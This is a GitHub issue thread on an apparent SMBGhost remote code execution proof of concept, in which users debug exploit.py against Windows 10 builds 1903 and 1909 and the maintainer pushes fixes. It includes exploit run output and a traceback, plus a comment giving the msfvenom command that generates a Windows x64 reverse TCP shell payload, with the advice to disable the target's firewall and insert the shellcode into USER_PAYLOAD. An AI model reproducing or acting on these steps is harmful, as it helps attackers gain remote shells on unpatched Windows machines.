
Comments (8)

895515845 commented on June 4, 2024

I have this problem, so what should I do?

from smbghost_rce_poc.

0xFF1E071F commented on June 4, 2024

I have this problem, so what should I do?

Unfortunately I couldn't find a solution yet :/


chompie1337 commented on June 4, 2024

nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly


chompie1337 commented on June 4, 2024

fix for this error has been pushed


0xFF1E071F commented on June 4, 2024

Thank you, I have another error now:

python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
  File "exploit.py", line 465, in <module>
    do_rce(args.ip, args.port)
  File "exploit.py", line 428, in do_rce
    search_hal_heap(ip, port)
  File "exploit.py", line 356, in search_hal_heap
    PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes


0xFF1E071F commented on June 4, 2024

OK ppl, if you are reading this don't forget to

  1. close win 10 b1903/1909 firewall
  2. run msfvenom as:
    msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
    and change the USER_PAYLOAD with this shellcode.

This code now works on b1903.

And I cannot make it exploit on 1909 machines.


0xFF1E071F commented on June 4, 2024

Ok, when I use the exploit on b1909 machines, python code works normally (I mean no error output). But the b1909 machine crashes and reboots.


0xFF1E071F commented on June 4, 2024

now works on 1909 thanks

